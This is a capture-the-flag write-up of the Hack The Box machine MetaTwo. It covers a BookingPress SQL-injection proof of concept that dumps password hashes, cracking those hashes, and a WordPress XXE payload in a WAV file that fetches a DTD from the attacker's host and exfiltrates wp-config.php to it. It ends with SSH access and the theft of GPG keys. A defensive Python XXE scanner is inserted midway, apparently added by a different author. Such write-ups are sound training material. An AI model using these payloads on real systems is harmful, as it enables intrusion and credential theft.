MetaTwo - HTB - Write-up
Nmap Scan:
┌──(root㉿kali)-[/home/…/Documents/ctf/htb/metatwo]
└─# nmap -sV -sC -O -T4 -n -Pn -oA fastscan 10.129.25.21
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-31 14:52 EST
Nmap scan report for 10.129.25.21
Host is up (0.033s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)
| 256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)
|_ 256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://metapress.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=12/31%OT=21%CT=1%CU=43799%PV=Y%DS=2%DC=I%G=Y%TM=63B093
OS:DB%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST
OS:11NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 240.03 seconds
We see an HTTP server and a redirect to metapress.htb that nmap did not follow.
┌──(root㉿kali)-[/home/…/Documents/ctf/htb/metatwo]
└─# dirsearch -u http://metapress.htb -t 100 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
Checking around the website we see a couple of different things, but nothing of much value. We can play around with the events page and see what it does. Taking a look at the source code (Ctrl+U) we can see the plugins being used. Let's see what exploits come up for them.
Load msfconsole and search for bookingpress. It looks like there is just one hit. Let's run info on it.
┌──(root㉿kali)-[/home/…/ctf/htb/metatwo/CVE-2022-0739]
└─# python3 booking-press-expl.py -u http://metapress.htb -n d0224b776d
- BookingPress PoC
-- Got db fingerprint: 10.5.15-MariaDB-0+deb11u1
-- Count of users: 2
|admin|admin@metapress.htb|$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.|
|manager|manager@metapress.htb|$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70|
┌──(root㉿kali)-[/home/…/Documents/ctf/htb/metatwo]
└─# john -w=/usr/share/wordlists/rockyou.txt hashfile
Let's try it out on the FTP server we found earlier.
┌──(root㉿kali)-[/home/…/Documents/ctf/htb/metatwo]
└─# ftp ftp://manager:partylikearockstar@10.129.15.139 21
Connected to 10.129.15.139.
220 ProFTPD Server (Debian) [::ffff:10.129.15.139]
331 Password required for manager
530 Login incorrect.
ftp: Login failed
ftp: Can't connect or login to host `10.129.15.139:ftp'
221 Goodbye.
No luck.
There was a dashboard page. Let's give it a shot.

We were able to log into it. Digging around we find a place to upload media. We can check the info of the page and also use Wappalyzer to grab the specific version of WordPress.
Doing some recon on this version and on the Media Upload section of the Library, I came across a nice walkthrough and a CVE: https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/
We first need to create an evil.dtd with the information below inside.
┌──(root㉿kali)-[/home/…/ctf/htb/metatwo/CVE-2021-29447]
└─# cat malicious.wav
RIFF�WAVEiXML{<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://10.10.14.34:8001/evil.dtd'>%remote;%init;%trick;] >
┌──(root㉿kali)-[/home/…/ctf/htb/metatwo/CVE-2021-29447]
└─# cat evil.dtd
" >
We can upload it to the interface and get a base64'd output.
We can use the below to get info.
It shows us that we were able to pull the /etc/passwd file. We know the website is using Nginx, so we could pull the nginx config and gather some more information.
Refactor our evil.dtd:
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/var/www/metapress.htb/blog/wp-config.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.34:8001/?p=%file;'>" >
That one had a lot of creds in it.
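The WAV trick above works because WordPress passes the file's iXML metadata chunk to an XML parser that still honours DOCTYPE and external entities. The scanner below is an added example, not code from this write-up or from WordPress: it walks the RIFF chunk list of an upload, pulls out any iXML chunk and flags a DOCTYPE or an external (SYSTEM/PUBLIC) entity declaration, which is the check a media-upload handler or a WAF rule would apply before handing the file to any parser. The two sample files are constructed inline; the entity URL in the hostile one is a placeholder host, not a real server.

```python
import re
import struct

# Constructed samples (not from the write-up). HOSTILE_IXML has the shape of
# the CVE-2021-29447 payload with a placeholder host; BENIGN_IXML is the kind
# of broadcast-metadata block a real recorder writes.
HOSTILE_IXML = (
    b"<?xml version=\"1.0\"?>"
    b"<!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://example.invalid/evil.dtd'>%remote;]>"
)
BENIGN_IXML = b"<?xml version=\"1.0\"?><BWFXML><IXML_VERSION>1.5</IXML_VERSION></BWFXML>"


def build_wav(ixml_body: bytes) -> bytes:
    """Assemble a minimal RIFF/WAVE container holding only an iXML chunk."""
    chunk = b"iXML" + struct.pack("<I", len(ixml_body)) + ixml_body
    if len(ixml_body) % 2:          # RIFF chunks are padded to an even length
        chunk += b"\x00"
    body = b"WAVE" + chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body


def iter_chunks(data: bytes):
    """Yield (fourcc, payload) for each chunk of a RIFF/WAVE file.

    A truncated or malformed file ends iteration instead of raising, so a
    hostile upload cannot crash the scanner or make it read past the buffer.
    """
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        return
    pos = 12
    while pos + 8 <= len(data):
        fourcc = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        payload = data[pos + 8:pos + 8 + size]
        if len(payload) < size:       # declared size runs past end of file
            return
        yield fourcc, payload
        pos += 8 + size + (size % 2)  # skip the pad byte on odd-sized chunks


# Constructs that have no business in user-supplied metadata: a DOCTYPE
# (internal subset) or any entity that points outside the document.
_DTD_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
_ENTITY_RE = re.compile(rb"<!ENTITY\b[^>]*\b(SYSTEM|PUBLIC)\b", re.IGNORECASE)


def find_xxe_in_wav(data: bytes) -> list:
    """Return a list of findings for suspicious iXML chunks; empty means clean."""
    findings = []
    for fourcc, payload in iter_chunks(data):
        if fourcc != b"iXML":
            continue
        if _ENTITY_RE.search(payload):
            findings.append("iXML chunk declares an external entity")
        elif _DTD_RE.search(payload):
            findings.append("iXML chunk carries a DOCTYPE declaration")
    return findings


def is_safe_upload(data: bytes) -> bool:
    """Gate an upload: reject the file if any iXML finding was produced."""
    return not find_xxe_in_wav(data)


if __name__ == "__main__":
    for label, body in (("hostile", HOSTILE_IXML), ("benign", BENIGN_IXML)):
        print(label, find_xxe_in_wav(build_wav(body)))
```

Rejecting the upload is the cheap outer layer; the fix that actually closes the bug is the one WordPress shipped, which is to parse the chunk with external entity loading disabled, so the scanner above belongs in front of a hardened parser rather than in place of one.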
┌──(root㉿kali)-[/home/…/ctf/htb/metatwo/CVE-2021-29447]
└─# ftp ftp://metapress.htb@10.129.15.139 21
We were able to get in, did some digging and found some more creds. I didn't see an email login anywhere, but let's give it a shot on the SSH port.

Well that worked out.
jnelson@meta2:~$ ls -la
total 32
drwxr-xr-x 4 jnelson jnelson 4096 Oct 25 12:53 .
drwxr-xr-x 3 root root 4096 Oct 5 15:12 ..
lrwxrwxrwx 1 root root 9 Jun 26 2022 .bash_history -> /dev/null
-rw-r--r-- 1 jnelson jnelson 220 Jun 26 2022 .bash_logout
-rw-r--r-- 1 jnelson jnelson 3526 Jun 26 2022 .bashrc
drwxr-xr-x 3 jnelson jnelson 4096 Oct 25 12:51 .local
dr-xr-x--- 3 jnelson jnelson 4096 Oct 25 12:52 .passpie
-rw-r--r-- 1 jnelson jnelson 807 Jun 26 2022 .profile
-rw-r----- 1 jnelson jnelson 33 Jan 2 04:02 user.txt
jnelson@meta2:~$ cd .passpie/
jnelson@meta2:~/.passpie$ ls
ssh
jnelson@meta2:~/.passpie$ ls -la
total 24
dr-xr-x--- 3 jnelson jnelson 4096 Oct 25 12:52 .
drwxr-xr-x 4 jnelson jnelson 4096 Oct 25 12:53 ..
-r-xr-x--- 1 jnelson jnelson 3 Jun 26 2022 .config
-r-xr-x--- 1 jnelson jnelson 5243 Jun 26 2022 .keys
dr-xr-x--- 2 jnelson jnelson 4096 Oct 25 12:52 ssh
jnelson@meta2:~/.passpie/ssh$ ls -la
total 16
dr-xr-x--- 2 jnelson jnelson 4096 Oct 25 12:52 .
dr-xr-x--- 3 jnelson jnelson 4096 Oct 25 12:52 ..
-r-xr-x--- 1 jnelson jnelson 683 Oct 25 12:52 jnelson.pass
-r-xr-x--- 1 jnelson jnelson 673 Oct 25 12:52 root.pass
We can pull out the keys we found, which potentially hold root's credentials.
scp jnelson@10.129.228.95:.passpie/.keys .keys
Remove the two public keys from the file.
Put it in a john format: gpg2john .keys > gpg.john